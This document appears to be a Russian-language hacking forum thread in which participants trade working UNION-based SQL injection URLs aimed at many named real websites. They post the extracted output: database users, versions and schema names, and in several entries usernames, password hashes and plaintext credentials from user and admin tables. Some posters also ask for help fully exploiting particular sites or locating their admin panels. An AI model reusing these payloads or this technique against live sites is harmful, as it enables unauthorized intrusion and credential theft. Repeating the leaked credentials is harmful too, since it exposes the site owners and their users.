SQL Инъекции

http://www.bankpersonal.dp.ua

код:

http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(table_name,0x3a,column_name),4+from+information_schema.columns/*

код:

http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat_ws(0x3a,passw,login,name,id),4+from+job_catvip/* <--- это единственное интересное что я нашел,

а вот в этой ---> http://www.bankpersonal.dp.ua/news.php3?action=details&news_id=-15+union+select+1,2,concat(0x3a,passw,login,name,id),4+from+bank_kiev.auth/* почему-то нет вывода



первый раз вижу вывод в такой форме
код:

http://www.profnavigator.ru/tmpl2.php?PN=doct.php&dout=text&dsubj=22&dtype=4&nid=-1608+union+select+concat_ws(0x3a,version(),user(),database()),2/* кто нить встречал такое???

 

Мну непонял чо сервак от него хочед! Вот вам на растерзание
PHP+MSSQL
http://www.super.md/?t=statall&id=0&time=3+OR+1=@@version--

Ошибка выполнения SQL запроса: statsGeneral 0xce8add383ab3a840178eb487785dc2f6,0,3 OR 1=@@version--,NULL,1,4096

 

http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7
4.0.20-standard-log:ntu:[email protected]

http://www.ntu.org/main/page.php?PageID=-6+union+select+1,concat_ws(0x3a,table_name,table_schema),3,4,5,6,7+from+information_schema.tables+limit+1,1/*
не выводит, хотя, по идее, должно.. раскрутит мож кто?

 

_http://www.nikita.ru/javagames/index.php?wrub=-422+union+select+1,AES_DECRYPT(AES_ENCRYPT(user(),0x71),0x71),3,4,5/*

 

www.softprom.com

Code:

http://www.softprom.com/products.phtml?subcategory_id=-71'+union+select+user(),2/*

user:root@localhost.rm1.softprom.ua

 

сам же вывел версию ветки..откуда здесь information_schema.tables

 

То есть ты просто заменил ключевые слова языка SQL на CHAR(...)? ))) Жесть... Так нельзя делать! На то они и ключевые слова языка, они не могут быть заменены ничем, ни возвращаемым значением функции, ни значаением возвращаемым подзапросом и т.д. Он тебе лепит ошибку только потому, что у тебя ошибка в синтаксисе запроса. Если парсятся ключевые слова в параметре, то тут уже ты ничего не сделаешь. Получатся некие пасхальные яйца от la2.acrossworld.ru - вроде как инъекция есть, но реализовать её нельзя.

 

Code:

http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,concat(user(),0x3a,version(), 0x3a,database()),6,7,8/*

[email protected]:4.0.26:evro

Code:

http://www.monitor.autosurf-invest.com/programs.php?m=details&id=-9'+union+select+1,2,3,4,5,concat(login,0x3a, mail),7,8+from+users/*

Code:

http://www.salecap.com/order.php?action=buy&id=-1+union+select+1,concat(user(),0x3a, version(),0x3a,database()),3,4,5,6,7,8/*

sale34re_dblogin@localhost:4.0.27-standard-log:sal

Code:

http://www.denezhki.com/ShowArticle.php?id=-1+union+select+1,2,concat(user(),0x3a,ve rsion(),0x3a,database()),4/*

[email protected]:4.1.21:rublikicom_den

Code:

http://www.duniacyber.com/advertises_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat(user(),0x3a,ve rsion(),0x3a,database()),14,1 5,16,17,18/*

cyber_admin@localhost:4.0.27-standard:cyber_dccsql

 

HTML:

http://www.rusaero.aero/news/?id=-16'+union+select+1,111,122,133,144,user(),166,177,18,1/*

 

Code:

http://cinememorial.com/Acteur_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(user(),0x3a,version(),0x3a,database()),17,18,19,20 ,21,22,23,24,25,26,27,28,29,30,31,32,33/*

cinememorial@localhost:4.1.19-log:cinememorial_db

Code:

http://www.effedieffe.com/interventizeta.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,concat(user(),0x3a,version(),0x3a,database()),11,12,13,14, 15,16,17,18,19/*&parametro=esteri

[email protected]:4.1.22-standard-log:effedieffe_com_01

Code:

http://www.cre-es.com/monograficasdelegaciones/index.php?class=7&id=-1+union+select+1,concat(user(),0x 3a,version(),0x3a,database()),3,4,5,6,7/*

hjdfbhersnbxnkdh@localhost:4.0.27-log:cre_datos

Code:

http://www.sergioabreu.com/adm/noticia.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x3 a,database()),4, 5,6,7,8,9,10/*

[email protected]:4.0.27-max-log:abreu

Code:

http://www.beaufortbooks.com/books.php?id=-1+union+select+1,2,aes_decrypt(aes_encrypt(version(),0x71),0x71),4,5, 6,7,8,9,10,11,12,13/*

4.1.11-Debian_4sarge7-log

Code:

http://www.beaufortbooks.com/books.php?id=-1+union+select+1,username,password,4,5,6,7,8,9, 10,11,12,13+from+users+limit+0,1/*

mash: acbdeec8026b26b4bc94303dceb45dfe итд

Code:

http://www.schoolbytes.com/summary.php?id=-1+union+select+1,2,concat(user(),0x3a,version(),0x 3a,database()),4,5,6,7,8,9,10,11,12/*

schoolbytes@localhost:5.0.20-standard:schoolbytes

Code:

http://www.schoolbytes.com/summary.php?id=-1+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12+fro m+users+limit+0,1/*

mike:test

 

http://pride.uoregon.edu/section.php?id=-999+union+select+1,2,3,4,version(),6/*

 

помогите pаскрутит

Code:

http://24.delfi.lv/index.php?action=prod&aid=0&id='

 

Вот тебе перебор:

http://24.delfi.lv/index.php?action=prod&aid=0&id=100)+and+1=1/*
http://24.delfi.lv/index.php?action=prod&aid=0&id=100)+and+1=0/*

А вот union:

http://24.delfi.lv/index.php?action=prod&aid=0&id=100)+union+select+char(0x61,0x6e,0x74,0x69,0x63,0x68,0x61,0x74)/*

(вывода нет, в файл не пробовал)

 

net.ua

http://politdigest.net.ua/details_news.php?page=370&id=-722+union+select+1,database(),3,concat(version(),0x3a,user()),5,6,7,8,9,10,11,12/*


http://mignews.net.ua/akcent.php?id=-972+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13/*



http://mp3.gipershop.net.ua/descript.php?kodmob=-78+union+select+1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10/*



http://h.ua/art.php?id=-49257'+union+select+1,2,concat_ws(0x3a,id_admin,login,passwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48+from+bannsyst.bannsyst_admins/*

 

bakililar.az

Code:

http://www.bakililar.az/lenta/?id=-13033+union+select+1,2,3,4,concat_ws(char(58),version(),user(),database()),6+from+news+--+

4.0.27-standard:bakilila_lenta@localhost:bakilila_lenta
freemp3.org.ua

Code:

http://www.freemp3.org.ua/news.php?id=-83+union+select+1,2,3,4,concat_ws(char(58),version(),user(),database()),6,7+from+news+--+

4.1.22-log:freemp3_slovo@goliaph:freemp3_slovo
advpro.ru

Code:

http://www.advpro.ru/news/company/?year=2006'+union+select+1,concat_ws(char(58),version(),database(),user()),3,4+from+news+--+

4.1.20:u5107:advpro.ru@localhost

 

Code:

http://studyport.info/viewdetails.php?id=-2577+union+select+1,concat(username,0x3a,passwd,0x3a,email,0x3a,phone),3,4,5,6,7,8,9,10,11,12,13,14+from+user/*

 

HTML:

http://www.kino-ukraina.com.ua/news/?nid=-1'+union+select+1,2,3,database(),5,user()/*

 

вапсайт самого популярного телеканала украины


код:

http://wap.inter.ua/ru/utf/serials/?id=-9533+union+select+1,CAST(concat(version(),0x3a,user())+AS+BINARY),3,CAST(database()+AS+BINARY),5/* четвертый мускул

 

http://www.alturspro.ru/index.php?page=99999'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16/* не могу подобрать таблицы кто поможет просто для интереса какие там таблицы есть

 

вот ток где тут админка, я не знаю...